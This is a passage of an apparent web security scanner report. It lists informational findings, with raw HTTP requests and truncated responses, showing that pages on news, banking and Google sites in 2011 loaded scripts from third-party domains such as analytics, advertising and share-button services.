Content-Type: text/html
Content-Length: 9667

<!DOCTYPE html>
<html>
   <head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="description" content="At Filament Group, we build elegant communications and interacti
...[SNIP]...
<!-- /contain -->
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

17.147. http://www.firstnational.com/001/html/en/personal/personal.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/personal.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /001/html/en/personal/personal.html HTTP/1.1
Host: www.firstnational.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP

Response

HTTP/1.1 200 OK
Content-Length: 32290
Content-Type: text/html
Last-Modified: Wed, 02 Feb 2011 20:57:48 GMT
Accept-Ranges: bytes
ETag: "0aedbd81bc3cb1:d88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 21:59:46 GMT


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...
</script>
       <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
       </script>
...[SNIP]...

17.148. http://www.fis.com/fis/worldnews/worldnews.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /fis/worldnews/worldnews.asp HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:58:54 GMT
Connection: close
Content-Length: 83551
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=PMHBFPGBGMDOPCOGKGMJMGLM; path=/
Cache-control: private


<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta http-equiv="refresh" content="1800">
   <title>FIS - Worldnews - Icelandic Group still up for grabs</title
...[SNIP]...
<td>                                                                                <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=68727f58-180b-4533-bb75-9095c2c1f7b7&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...

17.149. http://www.forum-software.org/tag/ipboard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forum-software.org
Path:   /tag/ipboard

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tag/ipboard HTTP/1.1
Host: www.forum-software.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:47 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6.7
Set-Cookie: SESS280d8e8069f9a940cd2b7fa808fc752e=0d50d9dee0f91c069baeb303e13f8523; expires=Sat, 26-Feb-2011 04:40:07 GMT; path=/; domain=.forum-software.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 01:06:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Conte
...[SNIP]...
</script>
       <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
       </script>
...[SNIP]...
</script>
           <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
           <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</h4>

           <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

17.150. http://www.globalpost.com/dispatch/asia/110120/tunarama-festival-australia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.globalpost.com
Path:   /dispatch/asia/110120/tunarama-festival-australia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dispatch/asia/110120/tunarama-festival-australia HTTP/1.1
Host: www.globalpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (EL)
X-Powered-By: PHP/5.2.14
Last-Modified: Thu, 03 Feb 2011 01:06:49 GMT
Content-Type: text/html; charset=utf-8
Expires: Thu, 03 Feb 2011 01:06:50 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 01:06:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.o
...[SNIP]...
</script><script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
<!--paging_filter--><script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://c5.zedo.com/jsc/c5/fo.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- End Quantcast tag -->

<script type="text/javascript" language="javascript" src="http://live.presspl.us/client/globalpost.js"></script>
...[SNIP]...
</script><script type='text/javascript' src='http://disqus.com/forums/globalpost/embed.js'></script>
...[SNIP]...
</script>
<script src="http://publishers.halogennetwork.com/audience/global_post.js" type="text/javascript"></script>
...[SNIP]...

17.151. http://www.google.com/intl/en/options/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /intl/en/options/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /intl/en/options/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 02 Jan 2011 19:40:45 GMT
Date: Thu, 03 Feb 2011 01:11:05 GMT
Expires: Thu, 03 Feb 2011 01:11:05 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Connection: close

...<!DOCTYPE html>
<html lang="en">
<meta charset="utf-8">
<title>More Google Products</title>
<link rel="stylesheet" href="/options/default.css">

<div id="id">

<h1 id="logo"><a href="/webhp?hl=en">
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

17.152. http://www.google.com/services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /services/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /services/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 02 Jan 2011 07:45:29 GMT
Date: Thu, 03 Feb 2011 01:13:35 GMT
Expires: Thu, 03 Feb 2011 01:13:35 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Connection: close

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<script src='https://ssl.google-analytics.com/urchin.js' type='text/javascript'></script>
...[SNIP]...

17.153. http://www.google.com/support/news/bin/answer.py  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /support/news/bin/answer.py

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support/news/bin/answer.py?answer=40237&topic=8851&hl=en HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D4d822f04cf339198%26v%3D2%26c%3Da305e907%26s%3D4d4a0063%26t%3DA%3A0%3A40237%26sessref%3D; Expires=Thu, 03-Feb-2011 01:39:55 GMT; Path=/support; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:09:55 GMT
Expires: Thu, 03 Feb 2011 01:09:55 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
</script>
<script type="text/javascript" src="//www.blogger.com/feeds/1711799623563669845/posts/default?alt=json-in-script&callback=build_posts&max-results=1&orderby=published"></script>
...[SNIP]...
</script>
<script src='//www.google-analytics.com/ga.js'
type='text/javascript'>
</script>
...[SNIP]...

17.154. http://www.google.com/support/news_pub/bin/static.py  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /support/news_pub/bin/static.py

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support/news_pub/bin/static.py HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:09:59 GMT
Expires: Thu, 03 Feb 2011 01:09:59 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
</script>
<script src='//www.google-analytics.com/ga.js'
type='text/javascript'>
</script>
...[SNIP]...

17.155. http://www.google.com/support/websearch/bin/answer.py  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /support/websearch/bin/answer.py

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support/websearch/bin/answer.py?hl=en&answer=186645 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D7c057a4e1afa6cc8%26v%3D2%26c%3D8bb74c16%26s%3D4d4a003e%26t%3DA%3A1%3A186645%26sessref%3D; Expires=Thu, 03-Feb-2011 01:39:19 GMT; Path=/support; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:09:19 GMT
Expires: Thu, 03 Feb 2011 01:09:19 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
</script>
<script src='//www.google-analytics.com/ga.js'
type='text/javascript'>
</script>
...[SNIP]...

17.156. http://www.grist.org/article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.grist.org
Path:   /article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren HTTP/1.1
Host: www.grist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 01:15:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: PHPSESSID=394bce86b159c0f351253ee87caa8df9; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_visit=981364550; expires=Fri, 03-Feb-2012 01:15:50 GMT; path=/; domain=.grist.org
Set-Cookie: exp_last_activity=1296724550; expires=Fri, 03-Feb-2012 01:15:50 GMT; path=/; domain=.grist.org
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A82%3A%22%2Farticle%2Ffood-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren%2F%22%3B%7D; path=/; domain=.grist.org
Last-Modified: Thu, 03 Feb 2011 01:15:50 GMT
Content-Type: text/html
X-Cache: MISS from grist-squid02.prod.grist.org
X-Cache-Lookup: MISS from grist-squid02.prod.grist.org:80
Via: 1.0 grist-squid02.prod.grist.org (squid/3.1.8)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.faceb
...[SNIP]...
</script>

<script type="text/javascript" src="http://c5.zedo.com/jsc/c5/fo.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://c5.zedo.com/jsc/c5/fo.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://c5.zedo.com/jsc/c5/fo.js"></script>
...[SNIP]...
</script>
<script type='text/JavaScript' src='http://dingo.care2.com/petitions/widget/common/petition_embed_br.js'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://c5.zedo.com/jsc/c5/fo.js"></script>
...[SNIP]...
</div>


<script type="text/javascript" src="http://platform.twitter.com/widgets.js?v=25"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://c5.zedo.com/jsc/c5/fo.js"></script>
...[SNIP]...

17.157. http://www.guardian.co.uk/business/2011/jan/11/offshore-oil-industry-white-house  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /business/2011/jan/11/offshore-oil-industry-white-house

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/2011/jan/11/offshore-oil-industry-white-house HTTP/1.1
Host: www.guardian.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:15:50 GMT
Server: Apache
X-GU-jas: 07-16121
X-GU-PageRenderer: DefaultPageRenderer
Content-Language: en
Content-Type: text/html; charset=UTF-8
Set-Cookie: GU_MU=VFVvQnhRcjZERHdBQUNoYlFSUUFBQUJafEkxMytueWM9; path=/; domain=.guardian.co.uk; expires=Sun, 31-Jan-2021 01:15:49 GMT
Set-Cookie: GU_LOCATION=dXNhOjU6dHg6NDpkYWxsYXM6Mzo2MjM6YnJvYWRiYW5kOiAzMi43ODc6LTk2Ljc5OUA0NzI1NDI3MTgzMTgzMjE1MjMzMTk3MTM1OTcyNjIyMTAxNzUyOQ==; path=/; domain=.guardian.co.uk; expires=Thu, 24-Feb-2011 01:15:49 GMT
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 03
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Length: 98316


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" l
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.guim.co.uk/static/98816/common/styles/article-page-typography.css" media="screen" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://static.guim.co.uk/static/98816/common/external-scripts/jquery-libraries/jquery.cookie.js"></script>
...[SNIP]...
</script>
<script src="http://static.guim.co.uk/static/98816/common/scripts/gu-core.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://combo.guim.co.uk/98816/common/scripts/convertJSONtoAd+common/scripts/formChecker+common/scripts/glossaryPopupView+common/scripts/sendtoafriend+common/scripts/shareCounts+common/scripts/tweet_button.js"></script>
<script type="text/javascript" src="http://combo.guim.co.uk/98816/m-87~js/simplelightbox+m-87~js/simplelightbox-init+m-901~/static/gas-and-electricity/deal_finder.js"></script>
...[SNIP]...
</a>
    <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div class="promo-component obama-approval">

<script type="text/javascript" src="http://widgets.realclearpolitics.com/js/rcp_widget_144.js"></script>
...[SNIP]...

17.158. http://www.heraldsun.com.au/ipad/blue-sky-thinking-at-farm/story-fn6bn4mv-1225993868919  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heraldsun.com.au
Path:   /ipad/blue-sky-thinking-at-farm/story-fn6bn4mv-1225993868919

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ipad/blue-sky-thinking-at-farm/story-fn6bn4mv-1225993868919 HTTP/1.1
Host: www.heraldsun.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 69774
Content-Type: text/html;charset=UTF-8
X-Cache-Lookup: MISS from news.com.au:80
Cache-Control: max-age=263
Expires: Thu, 03 Feb 2011 01:20:17 GMT
Date: Thu, 03 Feb 2011 01:15:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-au" lang="en-au">
<hea
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://resources2.news.com.au/cs/heraldsun/css/print.css" />
                   <script type="text/javascript" src="http://resources1.news.com.au/cs/js/tanto-min.js"></script>
                   <script type="text/javascript" src="http://resources1.news.com.au/cs/js/network-3rdpartylibs-min.js"></script>
                   <script type="text/javascript" src="http://resources1.news.com.au/cs/js/base-modules-min.js"></script>
                   <script type="text/javascript" src="http://resources1.news.com.au/cs/js/site-heraldsun-min.js"></script>
...[SNIP]...
<link rel="stylesheet" media="screen" type="text/css" href="http://w.news-static.com/latest/v/vcms-facade-fatwire-min.css" />
                   <script type="text/javascript" src="http://w.news-static.com/latest/v/vcms-facade-fatwire-min.js"></script>
       <script type="text/javascript" src="http://sops.news.com.au/adkit/js/kit.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

17.159. http://www.invisionpower.com/company/contact.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /company/contact.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /company/contact.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=cce78ef272198dcc830c2cd1d7562812; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:38 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17404

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</label>
                       <script type="text/javascript" src="http://www.google.com/recaptcha/api/challenge?k=6LdNJLsSAAAAADrynOSYn1EYvU-AXWYD1oYYG2uh"></script>
...[SNIP]...

17.160. http://www.journalpioneer.com/News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.journalpioneer.com
Path:   /News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1 HTTP/1.1
Host: www.journalpioneer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:42 GMT
Set-Cookie: PHPSESSID=b01a1100153421468e753ab4f672b414; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, public
Pragma: no-cache
Keep-Alive: timeout=15, max=9982
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: NSC_M4_qse_vojt=ffffffffc3a09c6445525d5f4f58455e445a4a423660;path=/;httponly
Content-Length: 60632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head>

<title>Premi
...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico" />


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tcadops.leshebdos.com/adtag/locals/ad_tag_script.js"></script>
...[SNIP]...
</a>
       <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4b5f4aad3467dca3"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/challenge?k=6Lc7ab0SAAAAACXmnQMj4oN7sc1bwRrWv2mJGEnh"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

17.161. http://www.jpmorganchase.com/corporate/Home/home.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorganchase.com
Path:   /corporate/Home/home.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /corporate/Home/home.htm HTTP/1.1
Host: www.jpmorganchase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:19:27 GMT
Content-type: text/html
Connection: close

<html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN">
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>JPMorgan Chase
...[SNIP]...
</script>
<script type="text/javascript" src="https://chaseonline.chase.com/js/Reporting.js"></script>
...[SNIP]...

17.162. http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpost.com
Path:   /ArtsAndCulture/FoodAndWine/Article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ArtsAndCulture/FoodAndWine/Article.aspx?id=203979 HTTP/1.1
Host: www.jpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=lnetycrs52hjwi45jufkaq55; path=/; HttpOnly
Content-Type: text/html; charset=utf-8
Content-Length: 108706
Accept-Ranges: bytes
Cache-Control: private, max-age=420
Age: 0
Expires: Thu, 03 Feb 2011 01:23:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="ctl00_He
...[SNIP]...
<!-- Google DFP_SB START-->
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://213.8.137.51/erate/ErateReport.js"></script>
...[SNIP]...
<!-- GA End -->

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</a><script type='text/javascript' src='http://platform.twitter.com/widgets.js'></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...
</a><script type='text/javascript' src='http://platform.twitter.com/widgets.js'></script>
...[SNIP]...
</form>

<script language="javascript" src="http://i.total-media.net/jp/dc.js" type="text/javascript"></script>

